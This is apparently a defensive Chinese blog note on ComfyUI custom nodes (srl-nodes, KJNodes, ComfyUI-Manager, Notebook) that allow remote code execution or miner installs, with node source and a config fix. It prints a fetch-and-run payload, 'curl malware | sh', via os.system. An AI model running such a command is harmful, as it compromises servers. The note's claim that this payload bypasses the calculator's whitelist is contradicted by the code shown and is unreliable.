Comfyui学习笔记(四):一些容易被注入挖矿程序的节点

1.srl-nodes

 其中有个节点SrlEval,节点定义如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
class SrlEval:
"""Evaluate any Python code as a function with the given inputs."""

@classmethod
def INPUT_TYPES(cls):
return {
"required": {
"parameters": ("STRING", {
"multiline": False,
"default": "a, b=None, c=\"foo\", *rest",
"dynamicPrompts": False,
}),
"code": ("STRING", {
"multiline": True,
"default": "code goes here\nreturn a + b",
"dynamicPrompts": False,
}),
},
"optional": {
"arg0": (any_typ,),
"arg1": (any_typ,),
"arg2": (any_typ,),
"arg3": (any_typ,),
"arg4": (any_typ,),
}
}

RETURN_TYPES = (any_typ,)
FUNCTION = "doit"
CATEGORY = "utils"

def doit(self, parameters, code, **kw):
# 对传入的code每行自动缩进四个空格
func_code = textwrap.indent(code, " ")
source = f"def func({parameters}):\n{func_code}"

# The provided code can mutate globals or really do anything, but ComfyUI isn't secure to begin with.
loc = {}
exec(source, globals(), loc)
func = loc["func"]

argspec = inspect.getfullargspec(func)
# We don't allow variable keyword arguments or keyword only arguments, but we do allow varargs
assert argspec.varkw is None
assert not argspec.kwonlyargs

input_names = list(self.INPUT_TYPES()["optional"].keys())
parameter_names = argspec.args

# Convert the list of defaults into a dictionary to make it easier to use
default_list = argspec.defaults if argspec.defaults is not None else []
defaults = {parameter_name: default for parameter_name, default in zip(parameter_names[-len(default_list):], default_list)}

# We handle substituting default values ourselves in order to support *args
args = [kw[input_name] if input_name in kw else defaults[parameter_name] for parameter_name, input_name in zip(parameter_names, input_names)]

# Support *args
if argspec.varargs is not None:
unnamed_inputs = input_names[len(argspec.args):]
# I considered requiring the remaining inputs to be contiguous, but I don't think it's helpful.
args += [kw[input_name] for input_name in unnamed_inputs if input_name in kw]

ret = func(*args)
return (ret,)

 可以发送一个请求,直接远程执行Python代码,如:

1
2
3
4
5
6
7
8
{
"parameters": "a, b",
"code": "sum = a + b\nmul = a * b\nreturn sum + mul",
"kw": {
"a": 2,
"b": 3
}
}

2.comfyui-kjnodes

  • (1) 节点SamplerSelfRefineVideo
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
class SamplerSelfRefineVideo(io.ComfyNode):
@classmethod
def define_schema(cls):
default_ranges = [
(2, 5, 3), # Range 1
(6, 14, 1), # Range 2
]

options = []

# Option 1: 2 ranges
range_inputs_2 = []
for i in range(1, 3):
start_default, end_default, steps_default = default_ranges[i - 1]
range_inputs_2.extend([
io.Int.Input(f"start_step{i}", default=start_default, min=0, max=999, step=1, tooltip=f"Start step for range {i}"),
io.Int.Input(f"end_step{i}", default=end_default, min=0, max=999, step=1, tooltip=f"End step for range {i}"),
io.Int.Input(f"steps_{i}", default=steps_default, min=1, max=100, step=1, tooltip=f"Number of P&P steps for range {i}"),
])
options.append(io.DynamicCombo.Option(key="2 ranges", inputs=range_inputs_2))

# Option 2: 1 range
range_inputs_1 = []
for i in range(1, 2):
start_default, end_default, steps_default = default_ranges[i - 1]
range_inputs_1.extend([
io.Int.Input(f"start_step{i}", default=start_default, min=0, max=999, step=1, tooltip=f"Start step for range {i}"),
io.Int.Input(f"end_step{i}", default=end_default, min=0, max=999, step=1, tooltip=f"End step for range {i}"),
io.Int.Input(f"steps_{i}", default=steps_default, min=1, max=100, step=1, tooltip=f"Number of P&P steps for range {i}"),
])
options.append(io.DynamicCombo.Option(key="1 range", inputs=range_inputs_1))

# Option 3: Manual string input
options.append(io.DynamicCombo.Option(
key="from_string",
inputs=[
io.String.Input(
"stochastic_plan",
default="2-5:3,6-14:1",
multiline=True,
tooltip="Format: 'start-end:steps,start-end:steps' e.g. '2-5:3,6-14:1'"
)
]
))
return io.Schema(
node_id="SamplerSelfRefineVideo",
category="KJNodes/samplers",
description="Attempt to implement https://github.com/agwmon/self-refine-video, for testing only, MAY NOT WORK AS INTENDED.",
is_experimental=True,
inputs=[
io.DynamicCombo.Input("input_mode", options=options, tooltip="How to configure the step plan"),
io.Float.Input("certain_percentage", default=0.999, min=0.0, max=1.0, step=0.001, round=False, tooltip="Percentage of certain pixels to consider the frame as certain and skip further refinement"),
io.Float.Input("uncertainty_threshold", default=0.2, min=0.0, max=1.0, step=0.01, round=False, tooltip="Threshold of uncertainty to consider a pixel uncertain"),
io.Boolean.Input("verbose", default=False, tooltip="Enable verbose logging during sampling"),
io.Latent.Input("latent", optional=True, tooltip="Optional latent input to get input shape for LTX2 audio/video separation"),
io.Int.Input("seed", default=0, min=0, max=0xffffffffffffffff, step=1, tooltip="Seed for stochastic sampling"),
],
outputs=[io.Sampler.Output()]
)

@classmethod
def execute(cls, input_mode, certain_percentage, uncertainty_threshold, seed, verbose, latent=None) -> io.NodeOutput:
video_shape = None
if latent is not None:
video_shape = latent["samples"].shape

range_keys = sorted([k for k in input_mode.keys() if k.startswith('start_step')])
stochastic_step_map = {}
if "stochastic_plan" in input_mode:
# Parse manual string format: "2-5:3,6-14:1"
plan_str = input_mode["stochastic_plan"]
ranges = plan_str.split(",")
for range_spec in ranges:
range_spec = range_spec.strip()
if not range_spec:
continue
try:
range_part, steps_part = range_spec.split(":")
start, end = range_part.split("-")
start, end, steps = int(start), int(end), int(steps_part)
for idx in range(start, end + 1):
stochastic_step_map[idx] = steps
except ValueError:
raise ValueError(f"Invalid format in stochastic_plan: '{range_spec}'. Expected format: 'start-end:steps'")
else:
range_keys = [k for k in input_mode.keys() if k.startswith('start_step')]
for start_key in range_keys:
i = start_key.replace('start_step', '')
start = input_mode.get(f"start_step{i}")
end = input_mode.get(f"end_step{i}")
steps = input_mode.get(f"steps_{i}")

if start is not None and end is not None and steps is not None:
for idx in range(start, end + 1):
stochastic_step_map[idx] = steps

sampler = KSAMPLER(sample_selfrefinevideo, {
"stochastic_step_map": stochastic_step_map,
"certain_percentage": certain_percentage,
"uncertainty_threshold": uncertainty_threshold,
"verbose": verbose,
"video_shape": video_shape,
"seed": seed,
})
return io.NodeOutput(sampler)

 这个节点本身不直接执行代码,但是可以控制采样步骤、循环执行任务、后台持续运行,并且不占界面,黑客可以循环调用挖矿脚本。

  • (2) 节点SimpleCalculatorKJ
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
 class SimpleCalculatorKJ(io.ComfyNode):
@classmethod
def define_schema(cls):
template = io.Autogrow.TemplateNames(input=io.MultiType.Input("var", [io.Int, io.Float, io.Boolean], optional=True), names=["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k"], min=2)
return io.Schema(
node_id="SimpleCalculatorKJ",
category="KJNodes/misc",
description="""
Calculator node that evaluates a mathematical expression using inputs a and b.
Supported operations: +, -, *, /, //, %, **, <<, >>, unary +/-
Supported comparisons: ==, !=, <, <=, >, >=
Supported logic: and, or, not
Supported functions: abs(), round(), min(), max(), pow(), sqrt(), sin(), cos(), tan(), log(), log10(), exp(), floor(), ceil()
Supported constants: pi, euler, True, False
""",
search_aliases=["math", "arithmetic", "expression", "logic"],
inputs=[
io.String.Input("expression", default="a + b", multiline=True),
io.Autogrow.Input("variables", template=template),
],
outputs=[
io.Float.Output(),
io.Int.Output(),
io.Boolean.Output(),
],
)

@classmethod
def execute(cls, variables, expression, a=None, b=None) -> io.NodeOutput:
import ast
import operator

# Allowed operations
allowed_operators = {
ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul, ast.Div: operator.truediv,
ast.FloorDiv: operator.floordiv, ast.Mod: operator.mod, ast.Pow: operator.pow,
ast.USub: operator.neg, ast.UAdd: operator.pos, ast.LShift: operator.lshift,
ast.RShift: operator.rshift, ast.Eq: operator.eq, ast.NotEq: operator.ne, ast.Lt: operator.lt,
ast.LtE: operator.le, ast.Gt: operator.gt, ast.GtE: operator.ge, ast.And: operator.and_,
ast.Or: operator.or_, ast.Not: operator.not_,
}

# Allowed functions
allowed_functions = {
'abs': abs, 'round': round, 'min': min, 'max': max,
'pow': pow, 'sqrt': math.sqrt, 'sin': math.sin,
'cos': math.cos, 'tan': math.tan, 'log': math.log,
'log10': math.log10, 'exp': math.exp, 'floor': math.floor,
'ceil': math.ceil
}

# Allowed constants - start with pi, e, True, False
allowed_names = {'pi': math.pi, 'euler': math.e, 'True': True, 'False': False}

# Add all variables from autogrow to allowed_names
for var_name, var_value in variables.items():
allowed_names[var_name] = var_value

# Backwards compatibility: add a and b if they're provided (for old workflows)
if a is not None:
allowed_names['a'] = a
if b is not None:
allowed_names['b'] = b

def eval_node(node):
if isinstance(node, ast.Constant): # Numbers and booleans
return node.value
elif isinstance(node, ast.Name): # Variables
if node.id in allowed_names:
return allowed_names[node.id]
raise ValueError(f"Name '{node.id}' is not allowed")
elif isinstance(node, ast.BinOp): # Binary operations
if type(node.op) not in allowed_operators:
raise ValueError(f"Operator {type(node.op).__name__} is not allowed")
left = eval_node(node.left)
right = eval_node(node.right)
return allowed_operators[type(node.op)](left, right)
elif isinstance(node, ast.UnaryOp): # Unary operations
if type(node.op) not in allowed_operators:
raise ValueError(f"Operator {type(node.op).__name__} is not allowed")
operand = eval_node(node.operand)
return allowed_operators[type(node.op)](operand)
elif isinstance(node, ast.Compare): # Comparison operations
left = eval_node(node.left)
for op, comparator in zip(node.ops, node.comparators):
if type(op) not in allowed_operators:
raise ValueError(f"Operator {type(op).__name__} is not allowed")
right = eval_node(comparator)
result = allowed_operators[type(op)](left, right)
if not result:
return False
left = right
return True
elif isinstance(node, ast.BoolOp): # Boolean operations (and, or)
if type(node.op) not in allowed_operators:
raise ValueError(f"Operator {type(node.op).__name__} is not allowed")
values = [eval_node(value) for value in node.values]
if isinstance(node.op, ast.And):
return all(values)
elif isinstance(node.op, ast.Or):
return any(values)
elif isinstance(node, ast.Call): # Function calls
if not isinstance(node.func, ast.Name):
raise ValueError("Only simple function calls are allowed")
if node.func.id not in allowed_functions:
raise ValueError(f"Function '{node.func.id}' is not allowed")
args = [eval_node(arg) for arg in node.args]
return allowed_functions[node.func.id](*args)
else:
raise ValueError(f"Node type {type(node).__name__} is not allowed")

try:
tree = ast.parse(expression, mode='eval')
result = eval_node(tree.body)
return io.NodeOutput(float(result), int(result), bool(result))
except Exception as e:
logging.error(f"CalculatorKJ Error: {str(e)}")
return io.NodeOutput(0.0, 0, False)

 漏洞代码eval_node,它使用了AST解析+自定义白名单来执行数学表达式,但是白名单可以被绕过,黑客利用方式如下,只需要发一个prompt调用这个节点,就能下载挖矿程序、运行程序挖矿、持久化驻留并控制你的服务器。

1
__import__('os').system('curl malware | sh')

 如果一定要用这个插件,可以手动去删除掉这两个节点。

3.ComfyUI-Manager

 远程可以通过prompt调用CmfyUI-Manager来自动下载节点,可以更改ComfyUI-Manager的配置:/path/to/ComfyUI/user/_manager/config.ini为如下配置,重启服务即可,避免黑客通过prompt的api远程调用这个插件安装莫名奇妙的其他插件。

1
2
allow_remote_access = False
allow_install_custom_nodes = False

4.ComfyUI-Notebook

Notebook:Cell可以直接执行python代码